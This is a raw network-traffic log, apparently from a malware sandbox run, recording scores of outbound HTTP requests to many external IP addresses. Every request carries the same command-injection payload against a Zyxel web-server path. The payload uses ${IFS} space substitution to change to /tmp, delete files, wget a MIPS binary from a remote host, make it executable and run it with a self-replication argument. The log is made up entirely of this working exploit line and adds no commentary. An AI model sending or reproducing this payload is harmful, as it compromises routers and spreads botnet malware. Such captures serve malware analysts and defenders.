                                                  Jan 19, 2024 18:23:41.756185055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1000192.168.2.1356094116.132.46.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756226063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1001192.168.2.1348774213.204.123.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756273031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1002192.168.2.134788463.149.234.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756311893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1003192.168.2.13605464.161.8.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756342888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1004192.168.2.134504899.168.118.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756373882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1005192.168.2.1334386198.98.88.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756412029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1006192.168.2.135769279.125.233.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756447077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1007192.168.2.1352098173.106.228.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756490946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1008192.168.2.13473861.30.187.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756521940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1009192.168.2.1345798168.149.91.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756588936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1010192.168.2.1358702205.15.54.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756670952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1011192.168.2.136009836.185.32.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756675005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1012192.168.2.1354402216.222.74.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756671906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1013192.168.2.1351988135.186.151.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756720066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1014192.168.2.1353698189.155.140.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756743908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1015192.168.2.134324874.255.196.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756802082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1016192.168.2.1337230124.105.52.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756846905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1017192.168.2.1349396101.22.192.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756860018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1018192.168.2.134810839.234.137.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756908894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1019192.168.2.1351624128.161.129.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756946087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1020192.168.2.1346470180.17.83.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756974936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1021192.168.2.133811287.202.233.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757006884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1022192.168.2.133533067.220.249.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757045031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1023192.168.2.134181637.176.153.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757083893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1024192.168.2.133364497.51.225.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757148981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1025192.168.2.1337298116.123.43.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757184982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1026192.168.2.1359728181.172.219.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757221937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1027192.168.2.1352266112.96.235.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757260084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1028192.168.2.135537032.41.199.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757285118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1029192.168.2.1334334115.112.77.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757349014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1030192.168.2.1346114162.254.162.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757379055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1031192.168.2.133710024.254.72.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757406950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1032192.168.2.1341894116.60.181.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757448912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1033192.168.2.1337472144.64.118.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757476091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1034192.168.2.1337518138.53.151.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757531881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1035192.168.2.1335266210.143.43.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757577896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1036192.168.2.133563440.213.179.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757610083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1037192.168.2.1338346125.236.249.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757635117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1038192.168.2.134456842.65.124.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757669926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1039192.168.2.13560965.241.209.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757726908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1040192.168.2.1343890183.19.146.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757760048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1041192.168.2.134323432.3.77.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757795095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1042192.168.2.1351580107.194.170.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757838011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1043192.168.2.1335812176.162.250.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757882118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1044192.168.2.133687696.150.161.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757906914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1045192.168.2.1359620183.250.214.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757940054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1046192.168.2.1353454192.73.10.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.757989883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1047192.168.2.134161840.178.133.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758022070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1048192.168.2.1338516162.164.16.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758049965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1049192.168.2.1352916116.118.188.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758109093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1050192.168.2.135676840.234.14.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758160114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1051192.168.2.1334724140.52.177.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758186102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1052192.168.2.134898440.35.13.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758213997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1053192.168.2.1347926153.187.190.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758249044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1054192.168.2.1343674159.35.252.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758295059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1055192.168.2.1333938213.41.68.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758327007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1056192.168.2.1359904131.219.231.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758375883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1057192.168.2.135780052.246.179.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758426905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1058192.168.2.1360122196.1.73.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758466005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1059192.168.2.1345100207.240.17.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758503914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1060192.168.2.134007877.102.218.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758550882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1061192.168.2.134321295.24.209.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.758590937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1062192.168.2.1341736108.127.32.187443
                                                  TimestampBytes transferredDirectionData
